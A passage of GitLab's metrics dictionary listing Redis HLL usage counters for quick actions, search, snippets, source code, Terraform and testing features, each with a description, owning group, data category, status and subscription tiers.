`redis_hll_counters.quickactions.i_quickactions_remove_zoom_monthly` + +Count of MAU using the `/remove_zoom` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181747_i_quickactions_remove_zoom_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_remove_zoom_weekly` + +Count of WAU using the `/remove_zoom` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181745_i_quickactions_remove_zoom_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_reopen_monthly` + +Count of MAU using the `/reopen` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181751_i_quickactions_reopen_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_reopen_weekly` + +Count of WAU using the `/reopen` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181749_i_quickactions_reopen_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_shrug_monthly` + +Count of MAU using the `/shrug` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181755_i_quickactions_shrug_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_shrug_weekly` + +Count of WAU using the `/shrug` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181753_i_quickactions_shrug_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_spend_add_monthly` + +Count of MAU using the `/spend` quick action to add time spent + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181802_i_quickactions_spend_add_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_spend_add_weekly` + +Count of WAU using the `/spend` quick action to add time spent + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181800_i_quickactions_spend_add_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_spend_subtract_monthly` + +Count of MAU using the `/spend` quick action to subtract time spent + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181758_i_quickactions_spend_subtract_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_spend_subtract_weekly` + +Count of WAU using the `/spend` quick action to subtract time spent + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181756_i_quickactions_spend_subtract_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_submit_review_monthly` + +Count of MAU using the `/submit_review` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181806_i_quickactions_submit_review_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_submit_review_weekly` + +Count of WAU using the `/submit_review` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181804_i_quickactions_submit_review_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_subscribe_monthly` + +Count of MAU using the `/subscribe` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181809_i_quickactions_subscribe_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_subscribe_weekly` + +Count of WAU using the `/subscribe` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181808_i_quickactions_subscribe_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_tableflip_monthly` + +Count of MAU using the `/tableflip` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181813_i_quickactions_tableflip_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_tableflip_weekly` + +Count of WAU using the `/tableflip` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181811_i_quickactions_tableflip_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_tag_monthly` + +Count of MAU using the `/tag` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181817_i_quickactions_tag_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_tag_weekly` + +Count of WAU using the `/tag` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181815_i_quickactions_tag_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_target_branch_monthly` + +Count of MAU using the `/target_branch` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181821_i_quickactions_target_branch_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_target_branch_weekly` + +Count of WAU using the `/target_branch` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181819_i_quickactions_target_branch_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_title_monthly` + +Count of MAU using the `/title` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181824_i_quickactions_title_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_title_weekly` + +Count of WAU using the `/title` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181822_i_quickactions_title_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_todo_monthly` + +Count of MAU using the `/todo` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181828_i_quickactions_todo_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_todo_weekly` + +Count of WAU using the `/todo` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181826_i_quickactions_todo_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unassign_all_monthly` + +Count of MAU using the `/unassign` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181835_i_quickactions_unassign_all_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unassign_all_weekly` + +Count of WAU using the `/unassign` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181833_i_quickactions_unassign_all_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unassign_reviewer_monthly` + +Count of MAU using the `/unassign_reviewer` or `/remove_reviewer` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181839_i_quickactions_unassign_reviewer_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unassign_reviewer_weekly` + +Count of WAU using the `/unassign_reviewer` or `/remove_reviewer` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181837_i_quickactions_unassign_reviewer_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unassign_specific_monthly` + +Count of MAU using the `/unassign @user1` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181832_i_quickactions_unassign_specific_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unassign_specific_weekly` + +Count of WAU using the `/unassign @user1` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181830_i_quickactions_unassign_specific_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unlabel_all_monthly` + +Count of MAU using the `/unlabel` quick action to remove all labels + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181846_i_quickactions_unlabel_all_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unlabel_all_weekly` + +Count of WAU using the `/unlabel` quick action to remove all labels + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181845_i_quickactions_unlabel_all_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unlabel_specific_monthly` + +Count of MAU using the `/unlabel` or `/remove_label` quick action to remove one or more specific labels + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181843_i_quickactions_unlabel_specific_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unlabel_specific_weekly` + +Count of WAU using the `/unlabel` or `/remove_label` quick action to remove one or more specific labels + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181841_i_quickactions_unlabel_specific_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unlock_monthly` + +Count of MAU using the `/unlock` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181850_i_quickactions_unlock_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unlock_weekly` + +Count of WAU using the `/unlock` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181848_i_quickactions_unlock_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unsubscribe_monthly` + +Count of MAU using the `/unsubscribe` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181854_i_quickactions_unsubscribe_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_unsubscribe_weekly` + +Count of WAU using the `/unsubscribe` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181852_i_quickactions_unsubscribe_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_weight_monthly` + +Count of MAU using the `/weight` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216181857_i_quickactions_weight_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_weight_weekly` + +Count of WAU using the `/weight` quick action + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216181856_i_quickactions_weight_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_wip_monthly` + +Count of MAU using the `/wip` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181901_i_quickactions_wip_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_wip_weekly` + +Count of WAU using the `/wip` quick action on Merge Requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181859_i_quickactions_wip_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_zoom_monthly` + +Count of MAU using the `/zoom` quick action on Issues + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181905_i_quickactions_zoom_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.i_quickactions_zoom_weekly` + +Count of WAU using the `/zoom` quick action on Issues + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216181903_i_quickactions_zoom_weekly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.quickactions_total_unique_counts_monthly` + +Count of MAU using one or more quick actions + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184803_quickactions_total_unique_counts_monthly.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.quickactions.quickactions_total_unique_counts_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184801_quickactions_total_unique_counts_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.search.i_search_advanced_monthly` + +Calculated unique users to perform Advanced searches by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180427_i_search_advanced_monthly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.search.i_search_advanced_weekly` + +Calculated unique users to perform Advanced searches by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180425_i_search_advanced_weekly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.search.i_search_paid_monthly` + +Calculated unique users to perform a search with a paid license enabled by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216184035_i_search_paid_monthly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.search.i_search_paid_weekly` + +Calculated unique users to perform a search with a paid license enabled by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184033_i_search_paid_weekly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.search.i_search_total_monthly` + +Calculated unique users to perform Basic or Advanced searches by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180424_i_search_total_monthly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.search.i_search_total_weekly` + +Calculated unique users to perform Basic or Advanced searches by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180422_i_search_total_weekly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.search.search_total_unique_counts_monthly` + +Total unique users for i_search_total, i_search_advanced, i_search_paid for recent 28 days. This metric is redundant because advanced will be a subset of paid and paid will be a subset of total. i_search_total is more appropriate if you just want the total + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180431_search_total_unique_counts_monthly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.search.search_total_unique_counts_weekly` + +Calculated unique users to perform Basic or Advanced searches by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180429_search_total_unique_counts_weekly.yml) + +Group: `group::global search` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.secure.users_expanding_secure_security_report_monthly` + +Count of expanding the security report widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210409095855_users_expanding_secure_security_report_monthly.yml) + +Group: `group::static analysis` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.secure.users_expanding_secure_security_report_weekly` + +Count of expanding the security report widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210409095855_users_expanding_secure_security_report_weekly.yml) + +Group: `group::static analysis` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.snippets.i_snippets_show_monthly` + +Monthly number of users viewing snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184255_i_snippets_show_monthly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.snippets.i_snippets_show_weekly` + +Weekly number of users viewing snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184253_i_snippets_show_weekly.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.design_action_monthly` + +Count of total design actions (upload, delete, comment, reply) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182106_design_action_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.design_action_weekly` + +Count of total design actions (upload, delete, comment, reply) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216182104_design_action_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.git_write_action_monthly` + +Count of unique Git write actions + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184047_git_write_action_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.git_write_action_weekly` + +Count of unique Git write actions + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184045_git_write_action_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.i_source_code_code_intelligence_monthly` + +Count of unique users who use code intelligence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175117_i_source_code_code_intelligence_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.i_source_code_code_intelligence_weekly` + +Count of unique users who use code intelligence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175114_i_source_code_code_intelligence_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.merge_request_action_monthly` + +Count of unique users who perform an action on a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175113_merge_request_action_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.merge_request_action_weekly` + +Count of unique users who perform an action on a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175111_merge_request_action_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.project_action_monthly` + +Count of unique actions done on projects and related resources (create, edit, delete, comment) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182109_project_action_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.project_action_weekly` + +Count of unique actions done on projects and related resources (create, edit, delete, comment) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216182107_project_action_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.wiki_action_monthly` + +Count of unique actions done on a wiki (create, edit, delete) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182102_wiki_action_monthly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.source_code.wiki_action_weekly` + +Count of unique actions done on a wiki (create, edit, delete) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216182100_wiki_action_weekly.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.terraform.p_terraform_state_api_unique_users_monthly` + +Monthly active users of GitLab Managed Terraform states + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184259_p_terraform_state_api_unique_users_monthly.yml) + +Group: `group::configure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.terraform.p_terraform_state_api_unique_users_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184257_p_terraform_state_api_unique_users_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.testing.i_testing_full_code_quality_report_total_monthly` + +Count of unique users per week|month who visit the full code quality report + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182147_i_testing_full_code_quality_report_total_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_full_code_quality_report_total_weekly` + +Count of unique users per week who visit the full code quality report + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216182145_i_testing_full_code_quality_report_total_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_group_code_coverage_project_click_total_monthly` + +Aggregated count of unique users who have clicked from group code coverage page to an individual project page each month. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182153_i_testing_group_code_coverage_project_click_total_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_group_code_coverage_project_click_total_weekly` + +Aggregated count of unique users who have clicked from group code coverage page to an individual project page each week. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184132_i_testing_group_code_coverage_project_click_total_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_group_code_coverage_visit_total_monthly` + +Count of unique users per month who visited the group code coverage page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182143_i_testing_group_code_coverage_visit_total_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_group_code_coverage_visit_total_weekly` + +Count of unique users per week who visited the group code coverage page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216182141_i_testing_group_code_coverage_visit_total_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_load_performance_widget_total_monthly` + +Count of unique users per month who expanded the load performance report MR widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182156_i_testing_load_performance_widget_total_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_load_performance_widget_total_weekly` + +Count of unique users per week who expanded the load performance report MR widget + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216182154_i_testing_load_performance_widget_total_weekly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_metrics_report_artifact_uploaders_monthly` + +Tracks number of metrics reports uploaded monthly. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182200_i_testing_metrics_report_artifact_uploaders_monthly.yml) + +Group: `group::testing` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.testing.i_testing_metrics_report_artifact_uploaders_weekly` + +Count of unique users per week who trigger a pipeline that uploads a metrics report. + +[YAML 